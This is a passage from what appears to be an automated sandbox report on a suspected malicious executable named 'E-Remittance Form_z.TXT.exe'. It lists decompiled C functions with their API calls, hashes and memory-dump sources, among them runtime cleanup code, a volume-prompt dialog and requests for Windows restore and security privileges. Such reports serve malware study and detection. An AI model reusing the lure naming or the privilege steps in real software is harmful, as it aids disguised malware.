							E00A07A50(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00A07A50();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00A09B53(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}











                            0x00a0859a
                            0x00a085a5
                            0x00a085a7
                            0x00a085a9
                            0x00a085ae
                            0x00a085b1
                            0x00a085bf
                            0x00a085cb
                            0x00a085ce
                            0x00a085d1
                            0x00a085e3
                            0x00a085e8
                            0x00a085ea
                            0x00a085f5
                            0x00a085fb
                            0x00a08603
                            0x00a08605
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a085ec
                            0x00a085ec
                            0x00000000
                            0x00a085ec
                            0x00a085d3
                            0x00a085d3
                            0x00a085d4
                            0x00a085d4
                            0x00a08607
                            0x00a08608
                            0x00a08608
                            0x00a085b3
                            0x00a085b9
                            0x00a085bd
                            0x00a08610
                            0x00a08611
                            0x00a08617
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a085bd
                            0x00a0861e

                            APIs
                            • GetLastError.KERNEL32(?,?,?,00A07ED1,00A07B6D,?,00A08544,00000001,00000364,?,00A03394,?,?,?,00A02E0F,00000050), ref: 00A0859F
                            • _free.LIBCMT ref: 00A085D4
                            • _free.LIBCMT ref: 00A085FB
                            • SetLastError.KERNEL32(00000000), ref: 00A08608
                            • SetLastError.KERNEL32(00000000), ref: 00A08611
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLast$_free
                            • String ID:
                            • API String ID: 3170660625-0
                            • Opcode ID: ffbb16a0c2730de409fefab34848cbb07bc82c4d008a1d077dab19299d07d061
                            • Instruction ID: e6e63707d612362013f4ecf8ce1607d7c1487b1ca4346a68055138811d1fbad7
                            • Opcode Fuzzy Hash: ffbb16a0c2730de409fefab34848cbb07bc82c4d008a1d077dab19299d07d061
                            • Instruction Fuzzy Hash: 0C01497A6046082BD712B3707C45AAF35699BC13B07264124F896931C3DE3ADD02912C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F03C7, Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E009F03C7(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00A11161);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E009F0697(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E009F04BA(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}











                            0x009f03c7
                            0x009f03d0
                            0x009f03d2
                            0x009f03d7
                            0x009f03d8
                            0x009f03e2
                            0x009f03e4
                            0x009f03e9
                            0x009f03eb
                            0x009f03fb
                            0x009f0407
                            0x009f0409
                            0x009f040c
                            0x009f040e
                            0x009f0415
                            0x009f041b
                            0x009f041c
                            0x009f041f
                            0x009f040c
                            0x009f042e
                            0x009f043a
                            0x009f0446
                            0x009f0451
                            0x009f045c

                            APIs
                              • Part of subcall function 009F0697: ResetEvent.KERNEL32(?), ref: 009F06A9
                              • Part of subcall function 009F0697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 009F06BD
                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 009F03FB
                            • CloseHandle.KERNEL32(?,?), ref: 009F0415
                            • DeleteCriticalSection.KERNEL32(?), ref: 009F042E
                            • CloseHandle.KERNEL32(?), ref: 009F043A
                            • CloseHandle.KERNEL32(?), ref: 009F0446
                              • Part of subcall function 009F04BA: WaitForSingleObject.KERNEL32(?,000000FF,009F06CE,?), ref: 009F04C0
                              • Part of subcall function 009F04BA: GetLastError.KERNEL32(?), ref: 009F04CC
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                            • String ID:
                            • API String ID: 1868215902-0
                            • Opcode ID: b483f1ceb4c0b9d119242d2568bcb1f151f42ea285c6054189df60a5fb5152f3
                            • Instruction ID: 476f3df58c6f7b9c956178f5a34ccfc2b541871c479adf818cb2922786a1bc43
                            • Opcode Fuzzy Hash: b483f1ceb4c0b9d119242d2568bcb1f151f42ea285c6054189df60a5fb5152f3
                            • Instruction Fuzzy Hash: 5701B572000708EBC731DB64DC84BD6BBEDFB88710F004629F25A92161C775A955CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0B461, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A0B461(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xa1dd50; // 0xa1dd44
					if(_t23 != 0) {
						E00A07A50(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xa1dd54; // 0xa4088c
					if(_t24 != 0) {
						E00A07A50(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xa1dd58; // 0xa4088c
					if(_t25 != 0) {
						E00A07A50(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xa1dd80; // 0xa1dd48
					if(_t26 != 0) {
						E00A07A50(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xa1dd84; // 0xa40890
					if(_t27 != 0) {
						return E00A07A50(_t6);
					}
				}
				return _t6;
			}










                            0x00a0b467
                            0x00a0b46c
                            0x00a0b470
                            0x00a0b476
                            0x00a0b479
                            0x00a0b47e
                            0x00a0b482
                            0x00a0b488
                            0x00a0b48b
                            0x00a0b490
                            0x00a0b494
                            0x00a0b49a
                            0x00a0b49d
                            0x00a0b4a2
                            0x00a0b4a6
                            0x00a0b4ac
                            0x00a0b4af
                            0x00a0b4b4
                            0x00a0b4b5
                            0x00a0b4b8
                            0x00a0b4be
                            0x00000000
                            0x00a0b4c6
                            0x00a0b4be
                            0x00a0b4c9

                            APIs
                            • _free.LIBCMT ref: 00A0B479
                              • Part of subcall function 00A07A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?), ref: 00A07A66
                              • Part of subcall function 00A07A50: GetLastError.KERNEL32(?,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?,?), ref: 00A07A78
                            • _free.LIBCMT ref: 00A0B48B
                            • _free.LIBCMT ref: 00A0B49D
                            • _free.LIBCMT ref: 00A0B4AF
                            • _free.LIBCMT ref: 00A0B4C1
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 969d037e1a09254a1472d256db86faf79e43caf65f4ed5daaa768ac44034af7a
                            • Instruction ID: 2605c2ff1e087c291722affc9e20b7280e7831ba6307302ebeeb2b38c67d79c1
                            • Opcode Fuzzy Hash: 969d037e1a09254a1472d256db86faf79e43caf65f4ed5daaa768ac44034af7a
                            • Instruction Fuzzy Hash: 2BF01272A15218ABC620DBA4FA86C5E77E9AA007507549C05F04DE7591C735FE808A64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A075DB, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00A075DB(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xa1dd40; // 0x15425b8
					if(_t7 != 0xa1db20) {
						E00A07A50(_t7);
						 *0xa1dd40 = 0xa1db20;
					}
				}
				E00A07A50( *0xa40410);
				 *0xa40410 = 0;
				E00A07A50( *0xa40414);
				 *0xa40414 = 0;
				E00A07A50( *0xa40860);
				 *0xa40860 = 0;
				E00A07A50( *0xa40864);
				 *0xa40864 = 0;
				return 1;
			}




                            0x00a075e4
                            0x00a075e8
                            0x00a075ea
                            0x00a075f6
                            0x00a075f9
                            0x00a075ff
                            0x00a075ff
                            0x00a075f6
                            0x00a0760b
                            0x00a07618
                            0x00a0761e
                            0x00a07629
                            0x00a0762f
                            0x00a0763a
                            0x00a07640
                            0x00a07648
                            0x00a07651

                            APIs
                            • _free.LIBCMT ref: 00A075F9
                              • Part of subcall function 00A07A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?), ref: 00A07A66
                              • Part of subcall function 00A07A50: GetLastError.KERNEL32(?,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?,?), ref: 00A07A78
                            • _free.LIBCMT ref: 00A0760B
                            • _free.LIBCMT ref: 00A0761E
                            • _free.LIBCMT ref: 00A0762F
                            • _free.LIBCMT ref: 00A07640
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 3889d0668da3bf590b60ef999af0d1fa807393e3b93411acab0272dc0859334e
                            • Instruction ID: 5e33960cc640daab0556cef3b34723c370fc9e6b3cb6e256e458e641a42cb269
                            • Opcode Fuzzy Hash: 3889d0668da3bf590b60ef999af0d1fa807393e3b93411acab0272dc0859334e
                            • Instruction Fuzzy Hash: 9DF054BCD0923C8BC601EFB4BE05C5E3BE4B7967107065515F2125A2B1C7362613AFC5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A06C73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                            Download Yara Rule
                            C-Code - Quality: 88%
                            			E00A06C73(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00A0A7B3(_t52);
					GetModuleFileNameA(0, 0xa402b8, 0x104);
					_t49 =  *0xa40868; // 0x15333e0
					 *0xa40870 = 0xa402b8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xa402b8;
					}
					_v8 = 0;
					_v16 = 0;
					E00A06D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00A06F0C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00A06D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00A0A2CE(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xa4085c = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xa40860 = _t59;
									L16:
									E00A07A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xa4085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xa40860 = _t43;
						goto L10;
					} else {
						_t44 = E00A07ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00A07A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E00A07ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00A07DAB();
					return _t65;
				}
			}





















                            0x00a06c73
                            0x00a06c80
                            0x00a06ca0
                            0x00a06cb3
                            0x00a06cb9
                            0x00a06cbf
                            0x00a06cc7
                            0x00a06cce
                            0x00a06cce
                            0x00a06cd3
                            0x00a06cda
                            0x00a06ce1
                            0x00a06cf3
                            0x00a06cfa
                            0x00a06d19
                            0x00a06d25
                            0x00a06d40
                            0x00a06d43
                            0x00a06d4a
                            0x00a06d50
                            0x00a06d57
                            0x00a06d5a
                            0x00a06d5c
                            0x00a06d60
                            0x00a06d6a
                            0x00a06d6a
                            0x00a06d6c
                            0x00a06d72
                            0x00a06d75
                            0x00a06d77
                            0x00a06d7d
                            0x00a06d7e
                            0x00a06d84
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a06d62
                            0x00a06d62
                            0x00a06d62
                            0x00a06d65
                            0x00a06d66
                            0x00000000
                            0x00a06d62
                            0x00a06d52
                            0x00000000
                            0x00a06d52
                            0x00a06d2b
                            0x00a06d30
                            0x00a06d32
                            0x00a06d34
                            0x00000000
                            0x00a06cfc
                            0x00a06cfc
                            0x00a06d01
                            0x00a06d03
                            0x00a06d04
                            0x00a06d39
                            0x00a06d39
                            0x00a06d87
                            0x00a06d88
                            0x00000000
                            0x00a06d91
                            0x00a06c88
                            0x00a06c88
                            0x00a06c8f
                            0x00a06c90
                            0x00a06c92
                            0x00000000
                            0x00a06c97

                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe,00000104), ref: 00A06CB3
                            • _free.LIBCMT ref: 00A06D7E
                            • _free.LIBCMT ref: 00A06D88
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$FileModuleName
                            • String ID: C:\Users\user\Desktop\E-Remittance Form_z.TXT.exe
                            • API String ID: 2506810119-33866366
                            • Opcode ID: 1ab7ec6e6ae797ea15a7c587c22db8d97e592e85038e70cea05331e08cb5a6c9
                            • Instruction ID: 83c637c7b6b9d942ec9dd9186d61b8948ec6c5cffee5a8b51cbcc922e14f7023
                            • Opcode Fuzzy Hash: 1ab7ec6e6ae797ea15a7c587c22db8d97e592e85038e70cea05331e08cb5a6c9
                            • Instruction Fuzzy Hash: B631CEB5A0061CAFDB21DF99ED80D9EBBF8EF85314F104066F90497290D6719E51DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009E73B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E009E73B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E009FD870(E00A11321, _t61);
				E009FD940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E009E399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xa20042 == 0) {
						if(E009E7A15(L"SeSecurityPrivilege") != 0) {
							 *0xa20041 = 1;
						}
						E009E7A15(L"SeRestorePrivilege");
						 *0xa20042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xa20041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xa1de80() == 0) {
						if(E009EB32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E009E6BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E009FE214(_t32);
							if(_t32 == 5 && E009EFC98() == 0) {
								E009E1567(_t61 - 0x6c, 0x18);
								E009F0A9F(_t61 - 0x6c);
							}
							E009E6E03(0xa200e0, 1);
						} else {
							_t39 =  *0xa1de80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E009E159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}












                            0x009e73b9
                            0x009e73b9
                            0x009e73b9
                            0x009e73be
                            0x009e73c8
                            0x009e73d0
                            0x009e73d3
                            0x009e73d6
                            0x009e73d9
                            0x009e73dc
                            0x009e73df
                            0x009e73e4
                            0x009e73e5
                            0x009e73e6
                            0x009e73ec
                            0x009e73f4
                            0x009e7401
                            0x009e740f
                            0x009e7411
                            0x009e7411
                            0x009e741d
                            0x009e7422
                            0x009e7422
                            0x009e7430
                            0x009e7433
                            0x009e7434
                            0x009e7438
                            0x009e7438
                            0x009e7439
                            0x009e743a
                            0x009e743d
                            0x009e743e
                            0x009e743f
                            0x009e744a
                            0x009e7462
                            0x009e7477
                            0x009e7480
                            0x009e7485
                            0x009e7494
                            0x009e749c
                            0x009e74ac
                            0x009e74b4
                            0x009e74b4
                            0x009e74bd
                            0x009e7464
                            0x009e746d
                            0x009e7473
                            0x009e7475
                            0x00000000
                            0x00000000
                            0x009e7475
                            0x009e7462
                            0x009e74c3
                            0x009e74c7
                            0x009e74d0
                            0x009e74da

                            APIs
                            • __EH_prolog.LIBCMT ref: 009E73BE
                              • Part of subcall function 009E399D: __EH_prolog.LIBCMT ref: 009E39A2
                            • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 009E7485
                              • Part of subcall function 009E7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 009E7A24
                              • Part of subcall function 009E7A15: GetLastError.KERNEL32 ref: 009E7A6A
                              • Part of subcall function 009E7A15: CloseHandle.KERNEL32(?), ref: 009E7A79
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                            • String ID: SeRestorePrivilege$SeSecurityPrivilege
                            • API String ID: 3813983858-639343689
                            • Opcode ID: d1570174aa4457f9244d7760de9111314f3f232e3b1beb3e8a9adc7b095fbe11
                            • Instruction ID: cc70818a91f15077da6d06c7af8d3bf87d953be6903b9c2cdbfc2dbced51f1af
                            • Opcode Fuzzy Hash: d1570174aa4457f9244d7760de9111314f3f232e3b1beb3e8a9adc7b095fbe11
                            • Instruction Fuzzy Hash: 2131E971A04288AAEF22EBE9DC01BFEBB7DAF95340F008065F809A7192D7744E45C761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F9B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                            Download Yara Rule
                            C-Code - Quality: 62%
                            			E009F9B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E009E12D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0xa3fe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0xa3fe38), ( *0xa3fe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E009EB943(__eflags,  *( *0xa3fe38)));
					_push( *( *0xa3fe38));
					_push(E009EDA42(_t25, 0x8e));
					_t22 = E009E10B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0xa3fe38));
					goto L13;
				}
				goto L6;
			}












                            0x009f9b8e
                            0x009f9b93
                            0x009f9b98
                            0x009f9b9d
                            0x009f9bb5
                            0x009f9c45
                            0x009f9c47
                            0x00000000
                            0x009f9c47
                            0x009f9bbb
                            0x009f9bc1
                            0x009f9c34
                            0x009f9c36
                            0x009f9c3c
                            0x009f9c3f
                            0x00000000
                            0x009f9c3f
                            0x009f9bc6
                            0x009f9bda
                            0x00000000
                            0x009f9bda
                            0x009f9bcb
                            0x009f9bce
                            0x009f9c2a
                            0x009f9c30
                            0x009f9c14
                            0x009f9c15
                            0x00000000
                            0x009f9c15
                            0x009f9bd0
                            0x009f9bd3
                            0x009f9c12
                            0x00000000
                            0x009f9c12
                            0x009f9bd8
                            0x009f9be3
                            0x009f9bec
                            0x009f9bf2
                            0x009f9bfe
                            0x009f9c00
                            0x009f9c05
                            0x009f9c07
                            0x00000000
                            0x00000000
                            0x009f9c0e
                            0x00000000
                            0x009f9c0e
                            0x00000000

                            APIs
                              • Part of subcall function 009E12D7: GetDlgItem.USER32(00000000,00003021), ref: 009E131B
                              • Part of subcall function 009E12D7: SetWindowTextW.USER32(00000000,00A122E4), ref: 009E1331
                            • EndDialog.USER32(?,00000001), ref: 009F9C15
                            • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 009F9C2A
                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 009F9C3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ItemText$DialogWindow
                            • String ID: ASKNEXTVOL
                            • API String ID: 445417207-3402441367
                            • Opcode ID: 40fbe109daf2d35e485db7ad02e52822ff50567277481eb4fdfcfec26cefbdf9
                            • Instruction ID: 43aee912488055e5c66a60884853050dc6cc788e2b150ead6e13f00d1351d582
                            • Opcode Fuzzy Hash: 40fbe109daf2d35e485db7ad02e52822ff50567277481eb4fdfcfec26cefbdf9
                            • Instruction Fuzzy Hash: A411D333604148BFD612DFA8DE49FBA3BACEB8A300F240411F7459A0B2C7669E438725
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009ECE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009ECE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E009F11FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E009EFA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E009ED9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0x15535f0
					_t30 = E00A04E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E009ECC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0xa1d158 +  *_t30 * 0xc; // 0xa133e0
						E00A054E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
